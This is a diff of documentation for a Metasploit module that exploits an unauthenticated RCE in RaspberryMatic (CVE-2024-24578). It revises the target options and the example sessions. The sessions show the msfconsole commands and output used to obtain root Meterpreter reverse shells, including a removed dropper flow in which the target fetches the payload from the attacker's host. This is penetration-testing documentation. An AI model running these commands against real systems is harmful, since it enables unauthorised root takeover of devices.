@@ -35,15 +35,15 @@ You are now ready to test the module.
3535- [ ] ` set rhosts <ip-target> `
3636- [ ] ` set rport <port> `
3737- [ ] ` set lhost <attacker-ip> `
38- - [ ] ` set target <0=Unix/Linux Command, 1=Linux Dropper (ARM), 2=Linux Dropper (x86_64) > `
38+ - [ ] ` set target <0=Unix/Linux Command> `
3939- [ ] ` exploit `
4040- [ ] you should get a ` reverse shell ` or ` Meterpreter ` session depending on the ` payload ` and ` target ` settings
4141
4242## Options
4343No specific options defined.
4444
4545## Scenarios
46- ### RaspberryMatic OVA appliance - Unix/Linux Command target
46+ ### RaspberryMatic OVA appliance - Unix/Linux Command x64 target
4747``` msf
4848msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.6
4949rhosts => 192.168.201.6
@@ -76,10 +76,10 @@ meterpreter > pwd
7676/root
7777meterpreter >
7878```
79- ### RaspberryMatic Pi4 Model B compute board - Linux Dropper (ARM) Command target
79+ ### RaspberryMatic Pi4 Model B compute board - Unix/ Linux Command aarch64 target
8080``` msf
81- msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set target 1
82- target => 1
81+ msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set payload cmd/linux/http/aarch64/meterpreter_reverse_tcp
82+ payload => cmd/linux/http/aarch64/meterpreter_reverse_tcp
8383msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.10
8484rhosts => 192.168.201.10
8585msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
@@ -88,17 +88,11 @@ msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
8888[*] Running automatic check ("set AutoCheck false" to disable)
8989[*] Checking if 192.168.201.10:443 can be exploited.
9090[+] The target appears to be vulnerable. RaspberryMatic 3.65.8
91- [*] Executing Linux Dropper (ARM support) for linux/aarch64/meterpreter_reverse_tcp
92- [*] Using URL: http://192.168.201.8:8080/4h2lPduH4
93- [*] Uploading Aarv1CEc.tgz
91+ [*] Executing Unix/Linux Command for cmd/linux/http/aarch64/meterpreter_reverse_tcp
92+ [*] Uploading 8emVtVt6U.tgz
9493[*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE.
95- [*] Command Stager progress - 100.00% done (115/115 bytes)
96- [*] Client 192.168.201.10 (Wget/1.21.3) requested /4h2lPduH4
97- [*] Sending payload to 192.168.201.10 (Wget/1.21.3)
9894[*] Restoring original watchdog script.
99- [*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.10:34866) at 2025-01-28 18:10:01 +0000
100- [*] Server stopped.
101-
95+ [*] Meterpreter session 2 opened (192.168.201.8:4444 -> 192.168.201.10:40324) at 2025-02-03 17:40:01 +0000
10296meterpreter > sysinfo
10397Computer : 192.168.201.10
10498OS : (Linux 5.15.56)
@@ -109,31 +103,6 @@ meterpreter > getuid
109103Server username: root
110104meterpreter > pwd
111105/root
112- meterpreter >
113- ```
114- ### RaspberryMatic OVA appliance - Linux Dropper (x86_64) Command target
115- ``` msf
116- msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set target 2
117- target => 2
118- msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > set rhosts 192.168.201.6
119- rhosts => 192.168.201.6
120- msf6 exploit(linux/http/raspberrymatic_unauth_rce_cve_2024_24578) > rexploit
121- [*] Reloading module...
122- [*] Started reverse TCP handler on 192.168.201.8:4444
123- [*] Running automatic check ("set AutoCheck false" to disable)
124- [*] Checking if 192.168.201.6:443 can be exploited.
125- [+] The target appears to be vulnerable. RaspberryMatic 3.73.9
126- [*] Executing Linux Dropper (x86_64 support) for linux/x64/meterpreter_reverse_tcp
127- [*] Using URL: http://192.168.201.8:8080/8OlmzeRoa
128- [*] Uploading kovy0xZ9M.tgz
129- [*] Waiting 5 minutes for watchdog execution via cron to trigger the RCE.
130- [*] Command Stager progress - 100.00% done (115/115 bytes)
131- [*] Client 192.168.201.6 (Wget/1.21.4) requested /8OlmzeRoa
132- [*] Sending payload to 192.168.201.6 (Wget/1.21.4)
133- [*] Restoring original watchdog script.
134- [*] Meterpreter session 3 opened (192.168.201.8:4444 -> 192.168.201.6:55920) at 2025-01-30 22:25:02 +0000
135- [*] Server stopped.
136-
137106meterpreter >
138107```
139108## Limitations
0 commit comments